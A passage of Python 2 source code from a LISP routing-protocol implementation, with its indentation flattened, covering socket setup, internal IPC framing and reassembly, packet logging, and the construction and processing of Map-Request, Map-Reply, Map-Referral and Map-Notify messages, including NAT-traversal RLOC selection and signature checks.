self.global_ms_rloc.mask_len = self.global_ms_rloc.host_mask_len()
#endif
#
# Get private ETR RLOC address.
#
if (len(packet) < format_size): return(orig_packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.private_etr_rloc.afi = socket.ntohs(afi)
packet = self.private_etr_rloc.unpack_address(packet)
if (packet == None): return(orig_packet)
self.private_etr_rloc.mask_len = \
self.private_etr_rloc.host_mask_len()
#endif
#
# Get RTR list if any.
#
while (len(packet) >= format_size):
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi == 0): continue
rtr = lisp_address(socket.ntohs(afi), "", 0, 0)
packet = rtr.unpack_address(packet)
if (packet == None): return(orig_packet)
rtr.mask_len = rtr.host_mask_len()
self.rtr_list.append(rtr)
#endwhile
return(orig_packet)
#enddef
#endclass
class lisp_nat_info():
def __init__(self, addr_str, hostname, port):
self.address = addr_str
self.hostname = hostname
self.port = port
self.uptime = lisp_get_timestamp()
#enddef
def timed_out(self):
elapsed = time.time() - self.uptime
return(elapsed >= (LISP_INFO_INTERVAL * 2))
#enddef
#endclass
class lisp_info_source():
def __init__(self, hostname, addr_str, port):
self.address = lisp_address(LISP_AFI_IPV4, addr_str, 32, 0)
self.port = port
self.uptime = lisp_get_timestamp()
self.nonce = None
self.hostname = hostname
self.no_timeout = False
#enddef
def cache_address_for_info_source(self):
key = self.address.print_address_no_iid() + self.hostname
lisp_info_sources_by_address[key] = self
#enddef
def cache_nonce_for_info_source(self, nonce):
self.nonce = nonce
lisp_info_sources_by_nonce[nonce] = self
#enddef
#endclass
#------------------------------------------------------------------------------
#
# lisp_concat_auth_data
#
# Take each longword and convert to binascii by byte-swapping and zero filling
# longword that leads with 0.
#
def lisp_concat_auth_data(alg_id, auth1, auth2, auth3, auth4):
if (lisp_is_x86()):
if (auth1 != ""): auth1 = byte_swap_64(auth1)
if (auth2 != ""): auth2 = byte_swap_64(auth2)
if (auth3 != ""):
if (alg_id == LISP_SHA_1_96_ALG_ID): auth3 = socket.ntohl(auth3)
else: auth3 = byte_swap_64(auth3)
#endif
if (auth4 != ""): auth4 = byte_swap_64(auth4)
#endif
if (alg_id == LISP_SHA_1_96_ALG_ID):
auth1 = lisp_hex_string(auth1)
auth1 = auth1.zfill(16)
auth2 = lisp_hex_string(auth2)
auth2 = auth2.zfill(16)
auth3 = lisp_hex_string(auth3)
auth3 = auth3.zfill(8)
auth_data = auth1 + auth2 + auth3
#endif
if (alg_id == LISP_SHA_256_128_ALG_ID):
auth1 = lisp_hex_string(auth1)
auth1 = auth1.zfill(16)
auth2 = lisp_hex_string(auth2)
auth2 = auth2.zfill(16)
auth3 = lisp_hex_string(auth3)
auth3 = auth3.zfill(16)
auth4 = lisp_hex_string(auth4)
auth4 = auth4.zfill(16)
auth_data = auth1 + auth2 + auth3 + auth4
#endif
return(auth_data)
#enddef
#
# lisp_open_listen_socket
#
# Open either internal socket or network socket. If network socket, it will
# open it with a local address of 0::0 which means the one socket can be
# used for IPv4 or IPv6. This is goodness and reduces the number of threads
# required.
#
def lisp_open_listen_socket(local_addr, port):
if (port.isdigit()):
if (local_addr.find(".") != -1):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#endif
if (local_addr.find(":") != -1):
if (lisp_is_raspbian()): return(None)
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
#endif
sock.bind((local_addr, int(port)))
else:
name = port
if (os.path.exists(name)):
os.system("rm " + name)
time.sleep(1)
#endif
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.bind(name)
#endif
return(sock)
#enddef
#
# lisp_open_send_socket
#
# Open socket for sending to port 4342.
#
def lisp_open_send_socket(internal_name, afi):
if (internal_name == ""):
if (afi == LISP_AFI_IPV4):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#endif
if (afi == LISP_AFI_IPV6):
if (lisp_is_raspbian()): return(None)
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
#endif
else:
if (os.path.exists(internal_name)): os.system("rm " + internal_name)
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.bind(internal_name)
#endif
return(sock)
#enddef
#
# lisp_close_socket
#
# Close network and internal sockets.
#
def lisp_close_socket(sock, internal_name):
sock.close()
if (os.path.exists(internal_name)): os.system("rm " + internal_name)
return
#endif
#
# lisp_is_running
#
# Test if one of "lisp-itr", "lisp-etr", "lisp-mr", "lisp-ms", "lisp-ddt", or
# "lisp-core" is running.
#
def lisp_is_running(node):
return(True if (os.path.exists(node)) else False)
#enddef
#
# lisp_packet_ipc
#
# Build IPC message for a LISP control packet destined for UDP port 4342. This
# packet goes to the lisp-core process and then it IPCs it to the appropriate
# LISP component process.
#
def lisp_packet_ipc(packet, source, sport):
return(("packet@" + str(len(packet)) + "@" + source + "@" + str(sport) + \
"@" + packet))
#enddef
#
# lisp_control_packet_ipc
#
# Build IPC message for a packet that needs to be source from UDP port 4342.
# Always sent by a LISP component process to the lisp-core process.
#
def lisp_control_packet_ipc(packet, source, dest, dport):
return("control-packet@" + dest + "@" + str(dport) + "@" + packet)
#enddef
#
# lisp_data_packet_ipc
#
# Build IPC message for a MAC, IPv4, or IPv6 data packet.
#
def lisp_data_packet_ipc(packet, source):
return("data-packet@" + str(len(packet)) + "@" + source + "@@" + packet)
#enddef
#
# lisp_command_ipc
#
# Build IPC message for a command message. Note this command IPC message must
# have same number of parameters as the "packet@" IPC. So an intentional
# double @ is put in after the source to indicate a null port.
#
def lisp_command_ipc(packet, source):
return("command@" + str(len(packet)) + "@" + source + "@@" + packet)
#enddef
#
# lisp_api_ipc
#
# Build IPC message for a command message. Note this command IPC message must
# have same number of parameters as the "packet@" IPC. So an intentional
# double @ is put in after the source to indicate a null port.
#
def lisp_api_ipc(source, data):
return("api@" + str(len(data)) + "@" + source + "@@" + data)
#enddef
#
# lisp_ipc
#
# Send IPC message to internal AF_UNIX socket if LISP component is running. We
# need to send in 15000 byte segments since the socket interface will not allow
# to support more. And socket.setsockopt() won't alow to increase SO_SNDBUF.
#
def lisp_ipc(packet, send_socket, node):
#
# Can't send an IPC message to a process that is not running.
#
if (lisp_is_running(node) == False):
lprint("Suppress sending IPC to {}".format(node))
return
#endif
ipc_len = 1500 if (packet.find("control-packet") == -1) else 9000
offset = 0
length = len(packet)
retry_count = 0
sleep_time = .001
while (length > 0):
segment_len = min(length, ipc_len)
segment = packet[offset:segment_len+offset]
try:
send_socket.sendto(segment, node)
lprint("Send IPC {}-out-of-{} byte to {} succeeded".format( \
len(segment), len(packet), node))
retry_count = 0
sleep_time = .001
except socket.error, e:
if (retry_count == 12):
lprint("Giving up on {}, consider it down".format(node))
break
#endif
lprint("Send IPC {}-out-of-{} byte to {} failed: {}".format( \
len(segment), len(packet), node, e))
retry_count += 1
time.sleep(sleep_time)
lprint("Retrying after {} ms ...".format(sleep_time * 1000))
sleep_time *= 2
continue
#endtry
offset += segment_len
length -= segment_len
#endwhile
return
#enddef
#
# lisp_format_packet
#
# Put a whitespace between every 4 bytes of a packet dump.
#
def lisp_format_packet(packet):
packet = binascii.hexlify(packet)
offset = 0
new = ""
length = len(packet) * 2
while (offset < length):
new += packet[offset:offset+8] + " "
offset += 8
length -= 4
#endfor
return(new)
#enddef
#
# lisp_send
#
# Send packet out.
#
def lisp_send(lisp_sockets, dest, port, packet):
lisp_socket = lisp_sockets[0] if dest.is_ipv4() else lisp_sockets[1]
#
# Remove square brackets. Use an IPv4 socket when address is IPv4, even
# when embedded in ::ffff:<ipv4-address>. This is a special case when
# an RTR sits behind a NAT and is sending a Map-Request. The ECM and
# Map-Request need to use the same ephemeral port and the Map-Reply
# needs to come to the ephemeral listening socket lisp_sockets[0];
#
# Also, on getchip and raspberry-pi OSes, there is no support for IPv6
# sockets, so we need to use the IPv4 embedded address and the IPv4
# socket.
#
address = dest.print_address_no_iid()
if (address.find("::ffff:") != -1 and address.count(".") == 3):
if (lisp_i_am_rtr): lisp_socket = lisp_sockets[0]
if (lisp_socket == None):
lisp_socket = lisp_sockets[0]
address = address.split("::ffff:")[-1]
#endif
#endif
lprint("{} {} bytes {} {}, packet: {}".format(bold("Send", False),
len(packet), bold("to " + address, False), port,
lisp_format_packet(packet)))
#
# If Map-Request/Reply RLOC-probe set TTL for outgoing packet to 255.
#
set_ttl = (LISP_RLOC_PROBE_TTL == 255)
if (set_ttl):
lisp_type = struct.unpack("B", packet[0])[0]
set_ttl = (lisp_type in [0x12, 0x28])
if (set_ttl): lisp_set_ttl(lisp_socket, LISP_RLOC_PROBE_TTL)
#endif
try: lisp_socket.sendto(packet, (address, port))
except socket.error, e:
lprint("socket.sendto() failed: {}".format(e))
#endtry
#
# Set back to default TTL.
#
if (set_ttl): lisp_set_ttl(lisp_socket, 64)
return
#enddef
#
# lisp_receive_segments
#
# Process 1500 byte segments if received IPC packet greater than what sockets
# can support.
#
def lisp_receive_segments(lisp_socket, packet, source, total_length):
#
# If the total length is equal to the segment length. We only have one
# segment which is the packet. Return it.
#
segment_len = total_length - len(packet)
if (segment_len == 0): return([True, packet])
lprint("Received {}-out-of-{} byte segment from {}".format(len(packet),
total_length, source))
#
# Otherwise, receive each segment and assemble it to return entire packet
# to caller.
#
length = segment_len
while (length > 0):
try: segment = lisp_socket.recvfrom(9000)
except: return([False, None])
segment = segment[0]
#
# The sender gave up and sent a new message that made it to us, last
# partial packet must be dropped.
#
if (segment.find("packet@") == 0):
seg = segment.split("@")
lprint("Received new message ({}-out-of-{}) while receiving " + \
"fragments, old message discarded", len(segment),
seg[1] if len(seg) > 2 else "?")
return([False, segment])
#endif
length -= len(segment)
packet += segment
lprint("Received {}-out-of-{} byte segment from {}".format( \
len(segment), total_length, source))
#endwhile
return([True, packet])
#enddef
#
# lisp_bit_stuff
#
# For every element in the array, insert a 0x40 ("@"). This is a bit-stuffing
# procedure. Only look array elemsnts with index 2 and above.
#
def lisp_bit_stuff(payload):
lprint("Bit-stuffing, found {} segments".format(len(payload)))
packet = ""
for segment in payload: packet += segment + "\x40"
return(packet[:-1])
#enddef
#
# lisp_receive
#
# Wait for packet to come in. This function call will block. For command
# IPCs, we need to loop to assemble all segments.
#
# For an internal socket, the format of a recvfrom() 'packet-data' is:
#
# "command" @ <total-length> @ <source> @ <packet-buffer>
# "packet" @ <total-length> @ <source> @ <command-buffer>
#
# So when an array of length 4 does not exist, we are receiving a fragment.
#
# For an external network socket, the format of a recvfrom() is:
#
# packet_data[0] = <packet-buffer>
# packet_data[1] = [<source>, <port>]
#
def lisp_receive(lisp_socket, internal):
while (True):
#
# Read from socket. Return if we received an error.
#
try: packet_data = lisp_socket.recvfrom(9000)
except: return(["", "", "", ""])
#
# This is a packet received on the network. If it was fragmented at the
# sender, then IP did it so it is assebled into a complete datagram
# in this sytem.
#
if (internal == False):
packet = packet_data[0]
source = lisp_convert_6to4(packet_data[1][0])
port = packet_data[1][1]
if (port == LISP_DATA_PORT):
do_log = lisp_data_plane_logging
packet_str = lisp_format_packet(packet[0:60]) + " ..."
else:
do_log = True
packet_str = lisp_format_packet(packet)
#endif
if (do_log):
lprint("{} {} bytes {} {}, packet: {}".format(bold("Receive",
False), len(packet), bold("from " + source, False), port,
packet_str))
#endif
return(["packet", source, port, packet])
#endif
#
# This is an IPC message that can be fragmented by lisp-core or the
# sending socket interface.
#
assembled = False
data = packet_data[0]
loop = False
while (assembled == False):
data = data.split("@")
if (len(data) < 4):
lprint("Possible fragment (length {}), from old message, " + \
"discarding", len(data[0]))
loop = True
break
#endif
opcode = data[0]
try:
total_length = int(data[1])
except:
error_str = bold("Internal packet reassembly error", False)
lprint("{}: {}".format(error_str, packet_data))
loop = True
break
#endtry
source = data[2]
port = data[3]
#
# If any of the data payload has a 0x40 byte (which is "@" in
# ascii), we will confuse the IPC separator from real data.
# So go to the payload and put in 0x40 where split() seperated
# the data. This particularly happens with Map-Notify messages
# since the first byte of the message is 0x40.
#
if (len(data) > 5):
packet = lisp_bit_stuff(data[4::])
else:
packet = data[4]
#endif
#
# Check for reassembly. Once reassembled, then we can process one
# large packet.
#
assembled, packet = lisp_receive_segments(lisp_socket, packet,
source, total_length)
if (packet == None): return(["", "", "", ""])
#
# We did not finish assembling a message but the sender sent a new
# one.
#
if (assembled == False):
data = packet
continue
#endif
if (port == ""): port = "no-port"
if (opcode == "command" and lisp_i_am_core == False):
index = packet.find(" {")
command = packet if index == -1 else packet[:index]
command = ": '" + command + "'"
else:
command = ""
#endif
lprint("{} {} bytes {} {}, {}{}".format(bold("Receive", False),
len(packet), bold("from " + source, False), port, opcode,
command if (opcode in ["command", "api"]) else ": ... " if \
(opcode == "data-packet") else \
": " + lisp_format_packet(packet)))
#endif
#endwhile
if (loop): continue
return([opcode, source, port, packet])
#endwhile
#enddef
#
# lisp_parse_packet
#
# Parse LISP control message.
#
def lisp_parse_packet(lisp_sockets, packet, source, udp_sport, ttl=-1):
trigger_flag = False
header = lisp_control_header()
if (header.decode(packet) == None):
lprint("Could not decode control header")
return(trigger_flag)
#endif
#
# Store source in internal lisp_address() format.
#
from_ipc = source
if (source.find("lisp") == -1):
s = lisp_address(LISP_AFI_NONE, "", 0, 0)
s.string_to_afi(source)
s.store_address(source)
source = s
#endif
if (header.type == LISP_MAP_REQUEST):
lisp_process_map_request(lisp_sockets, packet, None, 0, source,
udp_sport, False, ttl)
elif (header.type == LISP_MAP_REPLY):
lisp_process_map_reply(lisp_sockets, packet, source, ttl)
elif (header.type == LISP_MAP_REGISTER):
lisp_process_map_register(lisp_sockets, packet, source, udp_sport)
elif (header.type == LISP_MAP_NOTIFY):
if (from_ipc == "lisp-etr"):
lisp_process_multicast_map_notify(packet, source)
else:
if (lisp_is_running("lisp-rtr")):
lisp_process_multicast_map_notify(packet, source)
#endif
lisp_process_map_notify(lisp_sockets, packet, source)
#endif
elif (header.type == LISP_MAP_NOTIFY_ACK):
lisp_process_map_notify_ack(packet, source)
elif (header.type == LISP_MAP_REFERRAL):
lisp_process_map_referral(lisp_sockets, packet, source)
elif (header.type == LISP_NAT_INFO and header.is_info_reply()):
x, y, trigger_flag = lisp_process_info_reply(source, packet, True)
elif (header.type == LISP_NAT_INFO and header.is_info_reply() == False):
addr_str = source.print_address_no_iid()
lisp_process_info_request(lisp_sockets, packet, addr_str, udp_sport,
None)
elif (header.type == LISP_ECM):
lisp_process_ecm(lisp_sockets, packet, source, udp_sport)
else:
lprint("Invalid LISP control packet type {}".format(header.type))
#endif
return(trigger_flag)
#enddef
#
# lisp_process_rloc_probe_request
#
# Process Map-Request with RLOC-probe bit set.
#
def lisp_process_rloc_probe_request(lisp_sockets, map_request, source, port,
ttl):
p = bold("RLOC-probe", False)
if (lisp_i_am_etr):
lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(p))
lisp_etr_process_map_request(lisp_sockets, map_request, source, port,
ttl)
return
#endif
if (lisp_i_am_rtr):
lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(p))
lisp_rtr_process_map_request(lisp_sockets, map_request, source, port,
ttl)
return
#endif
lprint("Ignoring received {} Map-Request, not an ETR or RTR".format(p))
return
#enddef
#
# lisp_process_smr
#
def lisp_process_smr(map_request):
lprint("Received SMR-based Map-Request")
return
#enddef
#
# lisp_process_smr_invoked_request
#
def lisp_process_smr_invoked_request(map_request):
lprint("Received SMR-invoked Map-Request")
return
#enddef
#
# lisp_build_map_reply
#
# Build a Map-Reply and return a packet to the caller.
#
def lisp_build_map_reply(eid, group, rloc_set, nonce, action, ttl, rloc_probe,
keys, enc, auth, mr_ttl=-1):
map_reply = lisp_map_reply()
map_reply.rloc_probe = rloc_probe
map_reply.echo_nonce_capable = enc
map_reply.hop_count = 0 if (mr_ttl == -1) else mr_ttl
map_reply.record_count = 1
map_reply.nonce = nonce
packet = map_reply.encode()
map_reply.print_map_reply()
eid_record = lisp_eid_record()
eid_record.rloc_count = len(rloc_set)
eid_record.authoritative = auth
eid_record.record_ttl = ttl
eid_record.action = action
eid_record.eid = eid
eid_record.group = group
packet += eid_record.encode()
eid_record.print_record(" ", False)
local_rlocs = lisp_get_all_addresses() + lisp_get_all_translated_rlocs()
for rloc_entry in rloc_set:
rloc_record = lisp_rloc_record()
addr_str = rloc_entry.rloc.print_address_no_iid()
if (addr_str in local_rlocs):
rloc_record.local_bit = True
rloc_record.probe_bit = rloc_probe
rloc_record.keys = keys
if (rloc_entry.priority == 254 and lisp_i_am_rtr):
rloc_record.rloc_name = "RTR"
#endif
#endif
rloc_record.store_rloc_entry(rloc_entry)
rloc_record.reach_bit = True
rloc_record.print_record(" ")
packet += rloc_record.encode()
#endfor
return(packet)
#enddef
#
# lisp_build_map_referral
#
# Build a Map-Referral and return a packet to the caller.
#
def lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce):
map_referral = lisp_map_referral()
map_referral.record_count = 1
map_referral.nonce = nonce
packet = map_referral.encode()
map_referral.print_map_referral()
eid_record = lisp_eid_record()
rloc_count = 0
if (ddt_entry == None):
eid_record.eid = eid
eid_record.group = group
else:
rloc_count = len(ddt_entry.delegation_set)
eid_record.eid = ddt_entry.eid
eid_record.group = ddt_entry.group
ddt_entry.map_referrals_sent += 1
#endif
eid_record.rloc_count = rloc_count
eid_record.authoritative = True
#
# Use action passed into this function. But if NULL, select the action
# based on the first ddt-node child type.
#
incomplete = False
if (action == LISP_DDT_ACTION_NULL):
if (rloc_count == 0):
action = LISP_DDT_ACTION_NODE_REFERRAL
else:
ddt_node = ddt_entry.delegation_set[0]
if (ddt_node.is_ddt_child()):
action = LISP_DDT_ACTION_NODE_REFERRAL
#endif
if (ddt_node.is_ms_child()):
action = LISP_DDT_ACTION_MS_REFERRAL
#endif
#endif
#endif
#
# Conditions when the incomplete bit should be set in the Map-Referral.
#
if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
incomplete = (lisp_i_am_ms and ddt_node.is_ms_peer() == False)
#endif
eid_record.action = action
eid_record.ddt_incomplete = incomplete
eid_record.record_ttl = ttl
packet += eid_record.encode()
eid_record.print_record(" ", True)
if (rloc_count == 0): return(packet)
for ddt_node in ddt_entry.delegation_set:
rloc_record = lisp_rloc_record()
rloc_record.rloc = ddt_node.delegate_address
rloc_record.priority = ddt_node.priority
rloc_record.weight = ddt_node.weight
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
return(packet)
#enddef
#
# lisp_etr_process_map_request
#
# Do ETR processing of a Map-Request.
#
def lisp_etr_process_map_request(lisp_sockets, map_request, source, sport,
ttl):
if (map_request.target_group.is_null()):
db = lisp_db_for_lookups.lookup_cache(map_request.target_eid, False)
else:
db = lisp_db_for_lookups.lookup_cache(map_request.target_group, False)
if (db): db = db.lookup_source_cache(map_request.target_eid, False)
#endif
eid_str = map_request.print_prefix()
if (db == None):
lprint("Database-mapping entry not found for requested EID {}". \
format(green(eid_str, False)))
return
#endif
prefix_str = db.print_eid_tuple()
lprint("Found database-mapping EID-prefix {} for requested EID {}". \
format(green(prefix_str, False), green(eid_str, False)))
#
# Get ITR-RLOC to return Map-Reply to.
#
itr_rloc = map_request.itr_rlocs[0]
if (itr_rloc.is_private_address() and lisp_nat_traversal):
itr_rloc = source
#endif
nonce = map_request.nonce
enc = lisp_nonce_echoing
keys = map_request.keys
db.map_replies_sent += 1
packet = lisp_build_map_reply(db.eid, db.group, db.rloc_set, nonce,
LISP_NO_ACTION, 1440, map_request.rloc_probe, keys, enc, True, ttl)
#
# If we are sending a RLOC-probe Map-Reply to an RTR, data encapsulate it.
# If we are getting RLOC-probe Map-Requests from an xTR behind a NAT, and
# we are an ETR not behind a NAT, we want return the RLOC-probe Map-Reply
# to the swapped control ports.
#
# We could be getting a RLOC-probe from an xTR that is behind the same
# NAT as us. So do not data encapsulate the RLOC-probe reply.
#
if (map_request.rloc_probe and len(lisp_sockets) == 4):
public = (itr_rloc.is_private_address() == False)
rtr = itr_rloc.print_address_no_iid()
if (public and lisp_rtr_list.has_key(rtr)):
lisp_encapsulate_rloc_probe(lisp_sockets, itr_rloc, None, packet)
return
#endif
#endif
#
# Send to lisp-core process to send packet from UDP port 4342.
#
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
return
#enddef
#
# lisp_rtr_process_map_request
#
# Do ETR processing of a Map-Request.
#
def lisp_rtr_process_map_request(lisp_sockets, map_request, source, sport,
ttl):
#
# Get ITR-RLOC to return Map-Reply to.
#
itr_rloc = map_request.itr_rlocs[0]
if (itr_rloc.is_private_address()): itr_rloc = source
nonce = map_request.nonce
eid = map_request.target_eid
group = map_request.target_group
rloc_set = []
for myrloc in [lisp_myrlocs[0], lisp_myrlocs[1]]:
if (myrloc == None): continue
rloc = lisp_rloc()
rloc.rloc.copy_address(myrloc)
rloc.priority = 254
rloc_set.append(rloc)
#endfor
enc = lisp_nonce_echoing
keys = map_request.keys
packet = lisp_build_map_reply(eid, group, rloc_set, nonce, LISP_NO_ACTION,
1440, True, keys, enc, True, ttl)
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
return
#enddef
#
# lisp_get_private_rloc_set
#
# If the source-EID and target-EID of a Map-Request are behind the same NAT,
# that is, have the same global RLOC address, then return just the private
# addresses in the Map-Reply so the xTRs have shortest RLOC paths between
# each other and don't have to hair-pin through the NAT/firewall device.
#
def lisp_get_private_rloc_set(target_site_eid, seid, group):
rloc_set = target_site_eid.registered_rlocs
source_site_eid = lisp_site_eid_lookup(seid, group, False)
if (source_site_eid == None): return(rloc_set)
#
# Get global RLOC address from target site.
#
target_rloc = None
new_set = []
for rloc_entry in rloc_set:
if (rloc_entry.is_rtr()): continue
if (rloc_entry.rloc.is_private_address()):
new_rloc = copy.deepcopy(rloc_entry)
new_set.append(new_rloc)
continue
#endif
target_rloc = rloc_entry
break
#endfor
if (target_rloc == None): return(rloc_set)
target_rloc = target_rloc.rloc.print_address_no_iid()
#
# Get global RLOC address from source site.
#
source_rloc = None
for rloc_entry in source_site_eid.registered_rlocs:
if (rloc_entry.is_rtr()): continue
if (rloc_entry.rloc.is_private_address()): continue
source_rloc = rloc_entry
break
#endfor
if (source_rloc == None): return(rloc_set)
source_rloc = source_rloc.rloc.print_address_no_iid()
#
# If the xTRs are behind the same NAT, then we return private addresses.
#
site_id = target_site_eid.site_id
if (site_id == 0):
if (source_rloc == target_rloc):
lprint("Return private RLOCs for sites behind {}".format( \
target_rloc))
return(new_set)
#endif
return(rloc_set)
#endif
#
# If the xTRs are not behind the same NAT, but are configured in the
# same site-id, they can reach each other with private addresses. So
# return them in the RLOC-set.
#
if (site_id == source_site_eid.site_id):
lprint("Return private RLOCs for sites in site-id {}".format(site_id))
return(new_set)
#endif
return(rloc_set)
#enddef
#
# lisp_get_partial_rloc_set
#
# If the Map-Request source is found in the RLOC-set, return all RLOCs that
# do not have the same priority as the Map-Request source (an RTR supporting
# NAT-traversal) RLOC. Otherwise, return all RLOCs that are not priority 254.
#
def lisp_get_partial_rloc_set(registered_rloc_set, mr_source, multicast):
rtr_list = []
rloc_set = []
#
# Search the RTR list to see if the Map-Requestor is an RTR. If so,
# return the RLOC-set to the RTR so it can replicate directly to ETRs.
# Otherwise, return the RTR-list locator-set to the requesting ITR/PITR.
#
rtr_is_requestor = False
behind_nat = False
for rloc_entry in registered_rloc_set:
if (rloc_entry.priority != 254): continue
behind_nat |= True
if (rloc_entry.rloc.is_exact_match(mr_source) == False): continue
rtr_is_requestor = True
break
#endfor
#
# If we find an RTR in the RLOC-set, then the site's RLOC-set is behind
# a NAT. Otherwise, do not return a partial RLOC-set. This RLOC-set is in
# public space.
#
if (behind_nat == False): return(registered_rloc_set)
#
# An RTR can be behind a NAT when deployed in a cloud infrastructure.
# When the MS is in the same cloud infrastructure, the source address
# of the Map-Request (ECM) is not translated. So we are forced to put
# the private address in the rtr-list the MS advertises. But we should
# not return the private address in any Map-Replies. We use the private
# address in the rtr-list for the sole purpose to identify the RTR so
# we can return the RLOC-set of the ETRs.
#
ignore_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)
#
# Create two small lists. A list of RTRs which are unicast priority of
# 254 and a rloc-set which are records that are not priority 254.
#
for rloc_entry in registered_rloc_set:
if (ignore_private and rloc_entry.rloc.is_private_address()): continue
if (multicast == False and rloc_entry.priority == 255): continue
if (multicast and rloc_entry.mpriority == 255): continue
if (rloc_entry.priority == 254):
rtr_list.append(rloc_entry)
else:
rloc_set.append(rloc_entry)
#endif
#endif
#
# The RTR is sending the Map-Request.
#
if (rtr_is_requestor): return(rloc_set)
#
# An ITR is sending the Map-Request.
#
# Chcek the case where an ETR included a local RLOC and may be behind
# the same NAT as the requester. In this case, the requester can encap
# directly the private RLOC. If it is not reachable, the ITR can encap
# to the RTR. The ITR will cache a subset of the RLOC-set in this entry
# (so it can check the global RLOC first and not encap to itself).
#
rloc_set = []
for rloc_entry in registered_rloc_set:
if (rloc_entry.rloc.is_private_address()): rloc_set.append(rloc_entry)
#endfor
rloc_set += rtr_list
return(rloc_set)
#enddef
#
# lisp_store_pubsub_state
#
# Take information from Map-Request to create a pubsub cache. We remember
# the map-server lookup EID-prefix. So when the RLOC-set changes for this
# EID-prefix, we trigger a Map-Notify messate to the ITR's RLOC and port
# number.
#
def lisp_store_pubsub_state(reply_eid, itr_rloc, mr_sport, nonce, ttl, xtr_id):
pubsub = lisp_pubsub(itr_rloc, mr_sport, nonce, ttl, xtr_id)
pubsub.add(reply_eid)
return
#enddef
#
# lisp_convert_reply_to_notify
#
# In lisp_ms_process_map_request(), a proxy map-reply is built to return to
# a requesting ITR. If the requesting ITR set the N-bit in the Map-Request,
# a subscription request is being requested, return a Map-Notify so it knows
# it has been acked.
#
# This function takes a fully built Map-Reply, changes the first 4 bytes to
# make the message a Map-Notify and inserts 4-bytes of Key-ID, Alg-ID, and
# Authentication Length of 0. Then we have converted the Map-Reply into a
# Map-Notify.
#
def lisp_convert_reply_to_notify(packet):
#
# Get data we need from Map-Reply for Map-Notify.
#
record_count = struct.unpack("I", packet[0:4])[0]
record_count = socket.ntohl(record_count) & 0xff
nonce = packet[4:12]
packet = packet[12::]
#
# Build Map-Notify header.
#
first_long = (LISP_MAP_NOTIFY << 28) | record_count
header = struct.pack("I", socket.htonl(first_long))
auth = struct.pack("I", 0)
#
# Concat fields of Map-Notify.
#
packet = header + nonce + auth + packet
return(packet)
#enddef
#
# lisp_notify_subscribers
#
# There has been an RLOC-set change, inform all subscribers who have subscribed
# to this EID-prefix.
#
def lisp_notify_subscribers(lisp_sockets, eid_record, eid, site):
eid_str = eid.print_prefix()
if (lisp_pubsub_cache.has_key(eid_str) == False): return
for pubsub in lisp_pubsub_cache[eid_str].values():
itr = pubsub.itr
port = pubsub.port
itr_str = red(itr.print_address_no_iid(), False)
sub_str = bold("subscriber", False)
xtr_id = "0x" + lisp_hex_string(pubsub.xtr_id)
nonce = "0x" + lisp_hex_string(pubsub.nonce)
lprint(" Notify {} {}:{} xtr-id {} for {}, nonce {}".format( \
sub_str, itr_str, port, xtr_id, green(eid_str, False), nonce))
lisp_build_map_notify(lisp_sockets, eid_record, [eid_str], 1, itr,
port, pubsub.nonce, 0, 0, 0, site, False)
pubsub.map_notify_count += 1
#endfor
return
#enddef
#
# lisp_process_pubsub
#
# Take a fully built Map-Reply and send a Map-Notify as a pubsub ack.
#
def lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc, port, nonce,
ttl, xtr_id):
#
# Store subscriber state.
#
lisp_store_pubsub_state(reply_eid, itr_rloc, port, nonce, ttl, xtr_id)
eid = green(reply_eid.print_prefix(), False)
itr = red(itr_rloc.print_address_no_iid(), False)
mn = bold("Map-Notify", False)
xtr_id = "0x" + lisp_hex_string(xtr_id)
lprint("{} pubsub request for {} to ack ITR {} xtr-id: {}".format(mn,
eid, itr, xtr_id))
#
# Convert Map-Reply to Map-Notify header and send out.
#
packet = lisp_convert_reply_to_notify(packet)
lisp_send_map_notify(lisp_sockets, packet, itr_rloc, port)
return
#enddef
#
# lisp_ms_process_map_request
#
# Do Map-Server processing of a Map-Request. Returns various LISP-DDT internal
# and external action values.
#
def lisp_ms_process_map_request(lisp_sockets, packet, map_request, mr_source,
mr_sport, ecm_source):
#
# Look up EID in site cache. If we find it and it has registered for
# proxy-replying, this map-server will send the Map-Reply. Otherwise,
# send to one of the ETRs at the registered site.
#
eid = map_request.target_eid
group = map_request.target_group
eid_str = lisp_print_eid_tuple(eid, group)
itr_rloc = map_request.itr_rlocs[0]
xtr_id = map_request.xtr_id
nonce = map_request.nonce
action = LISP_NO_ACTION
pubsub = map_request.subscribe_bit
#
# Check if we are verifying Map-Request signatures. If so, do a mapping
# database lookup on the source-EID to get public-key.
#
sig_good = True
is_crypto_hash = (lisp_get_eid_hash(eid) != None)
if (is_crypto_hash):
sig = map_request.map_request_signature
if (sig == None):
sig_good = False
lprint(("EID-crypto-hash signature verification {}, " + \
"no signature found").format(bold("failed", False)))
else:
sig_eid = map_request.signature_eid
hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
if (sig_good):
sig_good = map_request.verify_map_request_sig(pubkey)
else:
lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
format(sig_eid.print_address(), hash_eid.print_address()))
#endif
pf = bold("passed", False) if sig_good else bold("failed", False)
lprint("EID-crypto-hash signature verification {}".format(pf))
#endif
#endif
if (pubsub and sig_good == False):
pubsub = False
lprint("Suppress creating pubsub state due to signature failure")
#endif
#
# There are two cases here that need attention. If the Map-Request was
